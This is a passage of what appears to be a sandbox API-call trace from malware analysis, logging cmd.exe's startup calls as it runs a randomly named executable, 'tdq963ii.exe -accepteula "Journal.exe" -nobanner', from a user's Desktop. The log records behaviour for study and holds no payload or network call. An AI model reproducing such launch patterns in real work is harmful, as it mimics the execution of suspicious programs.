_StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0221.260] GetCurrentThreadId () returned 0xa28 [0221.260] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa28) returned 0x60 [0221.260] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0221.260] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0221.261] SetThreadUILanguage (LangId=0x0) returned 0x409 [0221.782] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0221.782] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f714 | out: phkResult=0x22f714*=0x0) returned 0x2 [0221.782] VirtualQuery (in: lpAddress=0x22f74b, lpBuffer=0x22f6e4, dwLength=0x1c | out: lpBuffer=0x22f6e4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0221.782] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f6e4, dwLength=0x1c | out: lpBuffer=0x22f6e4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0221.782] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f6e4, dwLength=0x1c | out: lpBuffer=0x22f6e4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0221.782] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f6e4, dwLength=0x1c | out: lpBuffer=0x22f6e4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0221.783] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f6e4, dwLength=0x1c | out: lpBuffer=0x22f6e4*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0221.783] GetConsoleOutputCP () returned 0x1b5 [0221.783] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0221.783] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0221.784] _get_osfhandle (_FileHandle=1) returned 0x80 [0221.784] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0221.784] _get_osfhandle (_FileHandle=1) returned 0x80 [0221.784] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0221.784] _get_osfhandle (_FileHandle=0) returned 0x3 [0221.784] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0221.785] GetEnvironmentStringsW () returned 0x5221d0* [0221.785] GetProcessHeap () returned 0x510000 [0221.785] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb7e) returned 0x522d58 [0221.785] FreeEnvironmentStringsW (penv=0x5221d0) returned 1 [0221.785] GetProcessHeap () returned 0x510000 [0221.785] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4) returned 0x5218b0 [0221.785] GetEnvironmentStringsW () returned 0x5221d0* [0221.786] GetProcessHeap () returned 0x510000 [0221.786] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb7e) returned 0x5238e0 [0221.786] FreeEnvironmentStringsW (penv=0x5221d0) returned 1 [0221.786] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e684 | out: phkResult=0x22e684*=0x68) returned 0x0 [0221.786] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x0, lpData=0x22e690*=0x0, lpcbData=0x22e688*=0x1000) returned 0x2 [0221.786] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x4, lpData=0x22e690*=0x1, lpcbData=0x22e688*=0x4) returned 0x0 [0221.786] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x0, lpData=0x22e690*=0x1, lpcbData=0x22e688*=0x1000) returned 0x2 [0221.787] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x4, lpData=0x22e690*=0x0, lpcbData=0x22e688*=0x4) returned 0x0 [0221.787] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x4, lpData=0x22e690*=0x40, lpcbData=0x22e688*=0x4) returned 0x0 [0221.787] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x4, lpData=0x22e690*=0x40, lpcbData=0x22e688*=0x4) returned 0x0 [0221.787] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x0, lpData=0x22e690*=0x40, lpcbData=0x22e688*=0x1000) returned 0x2 [0221.787] RegCloseKey (hKey=0x68) returned 0x0 [0221.787] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e684 | out: phkResult=0x22e684*=0x68) returned 0x0 [0221.787] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x0, lpData=0x22e690*=0x40, lpcbData=0x22e688*=0x1000) returned 0x2 [0221.787] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x4, lpData=0x22e690*=0x1, lpcbData=0x22e688*=0x4) returned 0x0 [0221.787] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x0, lpData=0x22e690*=0x1, lpcbData=0x22e688*=0x1000) returned 0x2 [0221.787] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x4, lpData=0x22e690*=0x0, lpcbData=0x22e688*=0x4) returned 0x0 [0221.787] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x4, lpData=0x22e690*=0x9, lpcbData=0x22e688*=0x4) returned 0x0 [0221.787] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x4, lpData=0x22e690*=0x9, lpcbData=0x22e688*=0x4) returned 0x0 [0221.787] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e68c, lpData=0x22e690, lpcbData=0x22e688*=0x1000 | out: lpType=0x22e68c*=0x0, lpData=0x22e690*=0x9, lpcbData=0x22e688*=0x1000) returned 0x2 [0221.788] RegCloseKey (hKey=0x68) returned 0x0 [0221.788] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2f7 [0221.788] srand (_Seed=0x5f51e2f7) [0221.788] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Journal.exe\" -nobanner" [0221.788] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Journal.exe\" -nobanner" [0221.789] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0221.789] GetProcessHeap () returned 0x510000 [0221.789] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x210) returned 0x524468 [0221.789] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x524470, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0221.790] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0221.790] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0221.790] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0221.790] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.790] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0221.790] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0221.790] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0221.790] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0221.790] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0221.790] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0221.791] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0221.791] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0221.791] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0221.791] GetProcessHeap () returned 0x510000 [0221.791] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x54) returned 0x524680 [0221.791] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f450 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0221.791] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x22f450, lpFilePart=0x22f44c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f44c*="Desktop") returned 0x25 [0221.791] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0221.791] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f1cc | out: lpFindFileData=0x22f1cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x522050 [0221.792] FindClose (in: hFindFile=0x522050 | out: hFindFile=0x522050) returned 1 [0221.792] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x22f1cc | out: lpFindFileData=0x22f1cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x522050 [0221.792] FindClose (in: hFindFile=0x522050 | out: hFindFile=0x522050) returned 1 [0221.792] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0221.792] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x22f1cc | out: lpFindFileData=0x22f1cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x522050 [0221.792] FindClose (in: hFindFile=0x522050 | out: hFindFile=0x522050) returned 1 [0221.793] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0221.793] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0221.793] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0221.793] GetProcessHeap () returned 0x510000 [0221.793] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x522d58 | out: hHeap=0x510000) returned 1 [0221.793] GetEnvironmentStringsW () returned 0x5221d0* [0221.793] GetProcessHeap () returned 0x510000 [0221.793] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xb7e) returned 0x522d58 [0221.793] FreeEnvironmentStringsW (penv=0x5221d0) returned 1 [0221.793] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0221.793] GetProcessHeap () returned 0x510000 [0221.793] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x524680 | out: hHeap=0x510000) returned 1 [0221.793] GetProcessHeap () returned 0x510000 [0221.793] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x400e) returned 0x524ee0 [0221.794] GetProcessHeap () returned 0x510000 [0221.794] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x6e) returned 0x5221d0 [0221.794] GetProcessHeap () returned 0x510000 [0221.794] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x524ee0 | out: hHeap=0x510000) returned 1 [0221.794] GetConsoleOutputCP () returned 0x1b5 [0221.794] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0221.795] GetUserDefaultLCID () returned 0x409 [0221.795] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f590, cchData=128 | out: lpLCData="0") returned 2 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f590, cchData=128 | out: lpLCData="0") returned 2 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f590, cchData=128 | out: lpLCData="1") returned 2 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0221.796] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0221.796] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0221.798] GetProcessHeap () returned 0x510000 [0221.798] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20c) returned 0x522248 [0221.798] GetConsoleTitleW (in: lpConsoleTitle=0x522248, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.798] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0221.798] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0221.799] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0221.799] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0221.800] GetProcessHeap () returned 0x510000 [0221.800] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x400a) returned 0x524ee0 [0221.800] GetProcessHeap () returned 0x510000 [0221.800] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x524ee0 | out: hHeap=0x510000) returned 1 [0221.802] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0221.802] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0221.802] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0221.802] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0221.802] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0221.802] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0221.802] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0221.802] GetProcessHeap () returned 0x510000 [0221.802] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x58) returned 0x524680 [0221.802] GetProcessHeap () returned 0x510000 [0221.802] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x22) returned 0x522460 [0221.803] GetProcessHeap () returned 0x510000 [0221.803] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x52) returned 0x522490 [0221.804] GetConsoleTitleW (in: lpConsoleTitle=0x22f288, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0221.806] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0221.806] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0221.807] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0221.808] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0221.809] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0221.810] GetProcessHeap () returned 0x510000 [0221.810] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x210) returned 0x5224f0 [0221.810] GetProcessHeap () returned 0x510000 [0221.810] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x6c) returned 0x522708 [0221.810] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0221.811] GetProcessHeap () returned 0x510000 [0221.811] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x418) returned 0x522780 [0221.811] SetErrorMode (uMode=0x0) returned 0x0 [0221.811] SetErrorMode (uMode=0x1) returned 0x0 [0221.811] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x522788, lpFilePart=0x22eda8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22eda8*="Desktop") returned 0x25 [0221.811] SetErrorMode (uMode=0x0) returned 0x1 [0221.811] GetProcessHeap () returned 0x510000 [0221.811] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x522780, Size=0x6e) returned 0x522780 [0221.811] GetProcessHeap () returned 0x510000 [0221.811] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x522780) returned 0x6e [0221.811] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0221.811] 